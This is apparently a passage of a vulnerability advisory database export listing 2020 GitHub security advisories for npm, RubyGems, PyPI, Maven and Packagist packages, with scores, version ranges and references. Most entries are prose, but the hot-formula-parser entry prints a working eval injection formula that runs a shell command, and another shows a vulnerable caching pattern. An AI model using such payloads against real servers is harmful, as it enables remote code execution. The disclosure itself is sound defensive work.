+* Open an issue in [slp-validate](https://github.com/simpleledger/slp-validate/issues)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'slp-validate'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/simpleledger/slp-validate.js/security/advisories/GHSA-4w97-57v2-3w44'}, {'type': 'WEB', 'url': 'https://github.com/simpleledger/slp-validate/security/advisories/GHSA-4w97-57v2-3w44'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-11072'}, {'type': 'WEB', 'url': 'https://github.com/simpleledger/slp-validate/commit/cde95c0c6470dceb4f023cd462f904135ebd73e7'}]","{'cwe_ids': ['CWE-697'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-05-12T00:45:14Z', 'nvd_published_at': None}"
+1.4.0,GHSA-qfcv-5whw-7pcw,2021-10-08T19:56:28Z,2020-05-27T21:09:15Z,,['CVE-2020-11059'],Exposure of Sensitive Information to an Unauthorized Actor in AEgir,"### Impact
+`aegir publish` and `aegir build` may leak secrets from environmental variables in the browser bundle published to npm.
+
+### Patches
+The code has been patched, users should upgrade to >= 21.10.1
+
+### Workarounds
+Run `printenv` to check your environment variables and revoke any secrets.
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [aegir](https://github.com/ipfs/aegir)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'aegir'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '21.7.0'}, {'fixed': '21.10.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/ipfs/aegir/security/advisories/GHSA-qfcv-5whw-7pcw'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-11059'}, {'type': 'PACKAGE', 'url': 'https://github.com/ipfs/aegir'}]","{'cwe_ids': ['CWE-200'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-05-27T21:08:38Z', 'nvd_published_at': '2020-05-27T21:15:00Z'}"
+1.4.0,GHSA-2p68-f74v-9wc6,2023-08-08T16:28:29Z,2020-05-26T14:49:24Z,,['CVE-2020-8165'],ActiveSupport potentially unintended unmarshalling of user-provided objects in MemCacheStore and RedisCacheStore,"In ActiveSupport, there is potentially unexpected behaviour in the MemCacheStore and RedisCacheStore where, when
+untrusted user input is written to the cache store using the `raw: true` parameter, re-reading the result
+from the cache can evaluate the user input as a Marshalled object instead of plain text. Vulnerable code looks like:
+
+```
+data = cache.fetch(""demo"", raw: true) { untrusted_string }
+```
+Versions Affected: rails < 5.2.5, rails < 6.0.4
+Not affected: Applications not using MemCacheStore or RedisCacheStore. Applications that do not use the `raw` option when storing untrusted user input.
+Fixed Versions: rails >= 5.2.4.3, rails >= 6.0.3.1
+
+Impact
+------
+Unmarshalling of untrusted user input can have impact up to and including RCE. At a minimum,
+this vulnerability allows an attacker to inject untrusted Ruby objects into a web application.
+In addition to upgrading to the latest versions of Rails, developers should ensure that whenever
+they are calling `Rails.cache.fetch` they are using consistent values of the `raw` parameter for both
+reading and writing, especially in the case of the RedisCacheStore which does not, prior to these changes,
+detect if data was serialized using the raw option upon deserialization.
+
+Workarounds
+-----------
+It is recommended that application developers apply the suggested patch or upgrade to the latest release as
+soon as possible. If this is not possible, we recommend ensuring that all user-provided strings cached using
+the `raw` argument should be double-checked to ensure that they conform to the expected format.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'activesupport'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.2.4.3'}]}], 'database_specific': {'last_known_affected_version_range': '<= 5.2.4.2'}}, {'package': {'ecosystem': 'RubyGems', 'name': 'activesupport'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.3.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.0.3'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-8165'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/413388'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/activesupport/CVE-2020-8165.yml'}, {'type': 'WEB', 'url': 'https://groups.google.com/forum/#!topic/rubyonrails-security/bv6fW4S0Y1c'}, {'type': 'WEB', 'url': 'https://groups.google.com/g/rubyonrails-security/c/bv6fW4S0Y1c'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/06/msg00022.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/07/msg00013.html'}, {'type': 'WEB', 'url': 'https://weblog.rubyonrails.org/2020/5/18/Rails-5-2-4-3-and-6-0-3-1-have-been-released/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2020/dsa-4766'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00031.html'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2020-10/msg00034.html'}]","{'cwe_ids': ['CWE-502'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-05-26T14:47:03Z', 'nvd_published_at': '2020-06-19T18:15:00Z'}"
+1.4.0,GHSA-qf7v-8hj3-4xw7,2023-09-05T17:54:19Z,2020-05-06T19:41:29Z,,['CVE-2020-5390'],Improper Verification of Cryptographic Signature in PySAML2,"PySAML2 before 5.0.0 does not check that the signature in a SAML document is enveloped and thus signature wrapping is effective, i.e., it is affected by XML Signature Wrapping (XSW). The signature information and the node/object that is signed can be in different places and thus the signature verification will succeed, but the wrong data will be used. This specifically affects the verification of assertions that have been signed.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'pysaml2'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-5390'}, {'type': 'WEB', 'url': 'https://github.com/IdentityPython/pysaml2/commit/5e9d5acbcd8ae45c4e736ac521fd2df5b1c62e25'}, {'type': 'WEB', 'url': 'https://github.com/IdentityPython/pysaml2/commit/f27c7e7a7010f83380566a219fd6a290a00f2b6e'}, {'type': 'WEB', 'url': 'https://github.com/IdentityPython/pysaml2/blob/master/CHANGELOG.md#500-2020-01-13'}, {'type': 'WEB', 'url': 'https://github.com/IdentityPython/pysaml2/releases'}, {'type': 'WEB', 'url': 'https://github.com/IdentityPython/pysaml2/releases/tag/v5.0.0'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/02/msg00025.html'}, {'type': 'WEB', 'url': 'https://pypi.org/project/pysaml2/5.0.0/'}, {'type': 'WEB', 'url': 'https://usn.ubuntu.com/4245-1/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2020/dsa-4630'}]","{'cwe_ids': ['CWE-347'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-05-06T19:39:39Z', 'nvd_published_at': '2020-01-13T19:15:00Z'}"
+1.4.0,GHSA-4j77-gg36-9864,2021-01-08T20:17:04Z,2020-05-13T23:18:12Z,,['CVE-2020-11065'],Cross-Site Scripting in TYPO3 CMS Link Handling,"It has been discovered that link tags generated by `typolink` functionality are vulnerable to cross-site scripting - properties being assigned as HTML attributes have not been parsed correctly.
+
+Update to TYPO3 versions 9.5.17 or 10.4.2 that fix the problem described.
+
+### References
+* https://typo3.org/security/advisory/typo3-core-sa-2020-003","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.5.12'}, {'fixed': '9.5.17'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.2.0'}, {'fixed': '10.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/TYPO3/TYPO3.CMS/security/advisories/GHSA-4j77-gg36-9864'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-11065'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-05-13T23:05:48Z', 'nvd_published_at': None}"
+1.4.0,GHSA-rc77-xxq6-4mff,2021-08-25T21:04:44Z,2020-05-06T19:32:33Z,,['CVE-2020-6836'],Command Injection in hot-formula-parser,"Versions of `hot-formula-parser` prior to 3.0.1 are vulnerable to Command Injection. The package fails to sanitize values passed to the `parse` function and concatenates it in an `eval` call. If a value of the formula is supplied by user-controlled input it may allow attackers to run arbitrary commands in the server.
+Parsing the following formula creates a `test` file in the present directory:
+`""SUM([(function(){require('child_process').execSync('touch test')})(),2])""`
+
+
+## Recommendation
+
+Upgrade to version 3.0.1 or later.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'hot-formula-parser'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-6836'}, {'type': 'WEB', 'url': 'https://github.com/handsontable/formula-parser/pull/58'}, {'type': 'WEB', 'url': 'https://github.com/handsontable/formula-parser/commit/396b089738d4bf30eb570a4fe6a188affa95cd5e'}, {'type': 'WEB', 'url': 'https://blog.truesec.com/2020/01/17/reverse-shell-through-a-node-js-math-parser/'}, {'type': 'PACKAGE', 'url': 'https://github.com/handsontable/formula-parser'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1439'}]","{'cwe_ids': ['CWE-94'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-05-06T19:32:05Z', 'nvd_published_at': None}"
+1.4.0,GHSA-m8xj-5v73-3hh8,2021-08-25T21:07:36Z,2020-05-13T16:29:43Z,,['CVE-2020-7646'],curlrequest allows execution of arbitrary commands,curlrequest through 1.0.1 allows execution of arbitrary commands. It is possible to inject arbitrary commands by using a semicolon char in any of the `options` values.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'curlrequest'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7646'}, {'type': 'PACKAGE', 'url': 'https://github.com/node-js-libs/curlrequest'}, {'type': 'WEB', 'url': 'https://github.com/node-js-libs/curlrequest/blob/master/index.js#L239,'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-CURLREQUEST-568274'}]","{'cwe_ids': ['CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-05-12T16:53:31Z', 'nvd_published_at': None}"
+1.4.0,GHSA-c78w-2gw7-gjv3,2021-01-14T17:50:10Z,2020-05-11T20:00:15Z,,['CVE-2019-1010091'],XSS in TinyMCE,"### Impact
+A cross-site scripting (XSS) vulnerability was discovered in: the core parser and `media` plugin. The vulnerability allowed arbitrary JavaScript execution when inserting a specially crafted piece of content into the editor via the clipboard or APIs. This impacts all users who are using TinyMCE 4.9.9 or lower and TinyMCE 5.2.1 or lower.
+
+### Patches
+This vulnerability has been patched in TinyMCE 4.9.10 and 5.2.2 by improved HTML parsing and sanitization logic.
+
+### Workarounds
+The workarounds available are:
+- disable the media plugin and manually sanitize CDATA content (see below)
+or
+- upgrade to either TinyMCE 4.9.10 or TinyMCE 5.2.2
+
+#### Example: Manually strip CDATA elements
+```js
+setup: function(editor) {
+ editor.on('PreInit', function() {
+ editor.parser.addNodeFilter('#cdata', function(nodes) {
+ for (var i = 0; i < nodes.length; i++) {
+ nodes[i].remove();
+ }
+ });
+ });
+}
+```
+
+### Acknowledgements
+Tiny Technologies would like to thank Michał Bentkowski and [intivesec](https://github.com/intivesec) for discovering these vulnerabilities.
+
+### References
+https://www.tiny.cloud/docs/release-notes/release-notes522/#securityfixes
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in the [TinyMCE repo](https://github.com/tinymce/tinymce/issues)
+* Email us at [infosec@tiny.cloud](mailto:infosec@tiny.cloud)",[],"[{'package': {'ecosystem': 'npm', 'name': 'tinymce'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.9.10'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'tinymce'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.2.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tinymce/tinymce/security/advisories/GHSA-c78w-2gw7-gjv3'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-1010091'}, {'type': 'WEB', 'url': 'https://github.com/tinymce/tinymce/issues/4394'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-05-11T20:00:00Z', 'nvd_published_at': None}"
+1.4.0,GHSA-h79p-32mx-fjj9,2022-10-06T18:15:00Z,2020-05-21T21:09:04Z,,['CVE-2020-11973'],Apache Camel Netty enables Java deserialization by default,"Apache Camel Netty enables Java deserialization by default. Apache Camel 2.22.x, 2.23.x, 2.24.x, 2.25.0, 3.0.0 up to 3.1.0 are affected. 2.x users should upgrade to 2.25.1, 3.x users should upgrade to 3.2.0.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.camel:camel-netty'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.2.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-11973'}, {'type': 'WEB', 'url': 'https://camel.apache.org/security/CVE-2020-11973.html'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/camel'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuApr2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2020.html'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2020/05/14/9'}]","{'cwe_ids': ['CWE-502'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-05-21T17:42:21Z', 'nvd_published_at': '2020-05-14T17:15:00Z'}"
+1.4.0,GHSA-2rxh-h6h9-qrqc,2021-01-08T20:16:34Z,2020-05-13T23:18:38Z,,['CVE-2020-11066'],Class destructors causing side-effects when being unserialized in TYPO3 CMS,"Calling unserialize() on malicious user-submitted content can result in the following scenarios:
+- trigger deletion of arbitrary directory in file system (if writable for web server)
+- trigger message submission via email using identity of web site (mail relay)
+
+Another insecure deserialization vulnerability is required to actually exploit mentioned aspects.
+
+Update to TYPO3 versions 9.5.17 or 10.4.2 that fix the problem described.
+
+### References
+* https://typo3.org/security/advisory/typo3-core-sa-2020-004","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0'}, {'fixed': '9.5.17'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.0.0'}, {'fixed': '10.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/TYPO3/TYPO3.CMS/security/advisories/GHSA-2rxh-h6h9-qrqc'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-11066'}]","{'cwe_ids': ['CWE-1321', 'CWE-915'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-05-13T23:17:19Z', 'nvd_published_at': '2020-05-14T00:15:00Z'}"
+1.4.0,GHSA-27xj-rqx5-2255,2021-08-25T21:01:15Z,2020-05-15T18:58:44Z,,['CVE-2020-11619'],jackson-databind mishandles the interaction between serialization gadgets and typing,"FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.springframework.aop.config.MethodLocatingFactoryBean (aka spring-aop).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.fasterxml.jackson.core:jackson-databind'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.9.0'}, {'fixed': '2.9.10.4'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.9.10.3'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-11619'}, {'type': 'WEB', 'url': 'https://github.com/FasterXML/jackson-databind/issues/2680'}, {'type': 'PACKAGE', 'url': 'https://github.com/FasterXML/jackson-databind'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/04/msg00012.html'}, {'type': 'WEB', 'url': 'https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20200511-0004/'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2020.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2020.html'}]","{'cwe_ids': ['CWE-502'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-04-23T19:32:22Z', 'nvd_published_at': '2020-04-07T23:15:00Z'}"
+1.4.0,GHSA-wh69-wc6q-7888,2021-11-04T17:08:10Z,2020-05-28T18:42:59Z,,['CVE-2020-11079'],Command injection in node-dns-sync,dns-sync through 0.2.0 allows execution of arbitrary commands . This issue may lead to remote code execution if a client of the library calls the vulnerable method with untrusted input.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'dns-sync'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.2.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/skoranga/node-dns-sync/security/advisories/GHSA-wh69-wc6q-7888'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-11079'}, {'type': 'WEB', 'url': 'https://github.com/skoranga/node-dns-sync/commit/cb10a5ac7913eacc031ade7d91596277f31645dc'}, {'type': 'PACKAGE', 'url': 'https://github.com/skoranga/node-dns-sync'}]","{'cwe_ids': ['CWE-77', 'CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-05-28T18:42:31Z', 'nvd_published_at': '2020-05-28T19:15:00Z'}"
+1.4.0,GHSA-m42x-37p3-fv5w,2023-07-05T19:19:29Z,2020-05-26T15:09:48Z,,['CVE-2020-8162'],Circumvention of file size limits in ActiveStorage,"There is a vulnerability in ActiveStorage's S3 adapter that allows the Content-Length of a direct file upload to be modified by an end user.
+
+Versions Affected: rails < 5.2.4.2, rails < 6.0.3.1
+Not affected: Applications that do not use the direct upload functionality of the ActiveStorage S3 adapter.
+Fixed Versions: rails >= 5.2.4.3, rails >= 6.0.3.1
+
+Impact
+------
+
+Utilizing this vulnerability, an attacker can control the Content-Length of an S3 direct upload URL without receiving a new signature from the server. This could be used to bypass controls in place on the server to limit upload size.
+
+Workarounds
+-----------
+
+This is a low-severity security issue. As such, no workaround is necessarily until such time as the application can be upgraded.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'RubyGems', 'name': 'activestorage'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.2.4.3'}]}], 'database_specific': {'last_known_affected_version_range': '<= 5.2.4.2'}}, {'package': {'ecosystem': 'RubyGems', 'name': 'activestorage'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.3.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.0.3'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-8162'}, {'type': 'WEB', 'url': 'https://github.com/aws/aws-sdk-ruby/issues/2098'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/789579'}, {'type': 'PACKAGE', 'url': 'https://github.com/aws/aws-sdk-ruby/'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/activestorage/CVE-2020-8162.yml'}, {'type': 'WEB', 'url': 'https://groups.google.com/forum/#!topic/rubyonrails-security/PjU3946mreQ'}, {'type': 'WEB', 'url': 'https://groups.google.com/g/rubyonrails-security/c/PjU3946mreQ'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2020/dsa-4766'}]","{'cwe_ids': ['CWE-434', 'CWE-602'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-05-26T15:06:42Z', 'nvd_published_at': '2020-06-19T17:15:00Z'}"
+1.4.0,GHSA-qmqc-x3r4-6v39,2020-04-22T20:58:45Z,2020-05-15T18:59:07Z,,['CVE-2019-14893'],Polymorphic deserialization of malicious object in jackson-databind,"A flaw was discovered in FasterXML jackson-databind in all versions before 2.9.10 and 2.10.0, where it would permit polymorphic deserialization of malicious objects using the xalan JNDI gadget when used in conjunction with polymorphic type handling methods such as `enableDefaultTyping()` or when @JsonTypeInfo is using `Id.CLASS` or `Id.MINIMAL_CLASS` or in any other way which ObjectMapper.readValue might instantiate objects from unsafe sources. An attacker could use this flaw to execute arbitrary code.",[],"[{'package': {'ecosystem': 'Maven', 'name': 'com.fasterxml.jackson.core:jackson-databind'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.9.0'}, {'fixed': '2.9.10'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-14893'}, {'type': 'WEB', 'url': 'https://github.com/FasterXML/jackson-databind/issues/2469'}, {'type': 'WEB', 'url': 'https://github.com/FasterXML/jackson-databind/commit/998efd708284778f29d83d7962a9bd935c228317'}, {'type': 'WEB', 'url': 'https://access.redhat.com/errata/RHSA-2020:0729'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14893'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0@%3Cissues.bookkeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20200327-0006/'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2020.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2020.html'}]","{'cwe_ids': ['CWE-502'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2020-04-22T20:58:45Z', 'nvd_published_at': '2020-03-02T21:15:00Z'}"
+1.4.0,GHSA-jc83-cpf9-q7c6,2021-01-08T20:17:31Z,2020-05-12T00:39:03Z,,['CVE-2020-11071'],False-negative validation results in MINT transactions with invalid baton,"### Impact
+Users could experience false-negative validation outcomes for [MINT](https://github.com/simpleledger/slp-specifications/blob/master/slp-token-type-1.md#mint---extended-minting-transaction) transaction operations. A poorly implemented SLP wallet could allow spending of the affected tokens which would result in the destruction of a user's minting baton.
+
+### Patches
+npm package [slpjs](https://www.npmjs.com/package/slpjs) has been patched and published as version 0.27.2.
+
+
+### Workarounds
+Upgrade to slpjs 0.27.2.
+
+### References
+* slpjs [commit](https://github.com/simpleledger/slpjs/commit/3671be2ffb6d4cfa94c00c6dc8649d1ba1d75754)
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [slp-validate](https://github.com/simpleledger/slp-validate/issues) or [slpjs](https://github.com/simpleledger/slpjs/issues)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'slpjs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.27.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/simpleledger/slpjs/security/advisories/GHSA-jc83-cpf9-q7c6'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-11071'}, {'type': 'WEB', 'url': 'https://github.com/simpleledger/slpjs/commit/3671be2ffb6d4cfa94c00c6dc8649d1ba1d75754'}]","{'cwe_ids': ['CWE-697'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2020-05-12T00:26:13Z', 'nvd_published_at': None}"
+1.4.0,GHSA-347x-877p-hcwx,2021-01-08T21:08:47Z,2020-05-13T22:19:21Z,,['CVE-2020-11063'],Information Disclosure in Password Reset,"In TYPO3 CMS 10.4.0 through 10.4.1, it has been discovered that time-based attacks can be used with the password reset functionality for backend users. This allows an attacker to mount user enumeration based on email addresses assigned to backend user accounts.
+
+This has been fixed in 10.4.2.
+
+### References
+* https://typo3.org/security/advisory/typo3-core-sa-2020-001","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'typo3/cms-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.4.0'}, {'fixed': '10.4.2'}]}], 'database_specific': {'last_known_affected_version_range': '<= 10.4.1'}}]","[{'type': 'WEB', 'url': 'https://github.com/TYPO3/TYPO3.CMS/security/advisories/GHSA-347x-877p-hcwx'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-11063'}]","{'cwe_ids': ['CWE-204'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2020-05-13T22:16:54Z', 'nvd_published_at': None}"
+1.4.0,GHSA-59cf-m7v5-wh5w,2021-01-08T20:16:29Z,2020-05-13T22:17:34Z,,['CVE-2020-11070'],Cross-Site Scripting in SVG Sanitizer,"Slightly invalid or incomplete SVG markup is not correctly processed and thus not sanitized at all. Albeit the markup is not valid it still is evaluated in browsers and leads to cross-site scripting.
+
+An updated version 1.0.3 is available from the TYPo3 extension manager and at https://extensions.typo3.org/extension/download/svg_sanitizer/1.0.3/zip/
+Users of the extension are advised to update the extension as soon as possible.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 't3g/svg-sanitizer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/TYPO3GmbH/svg_sanitizer/security/advisories/GHSA-59cf-m7v5-wh5w'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-11070'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2020-05-13T18:39:24Z', 'nvd_published_at': None}"
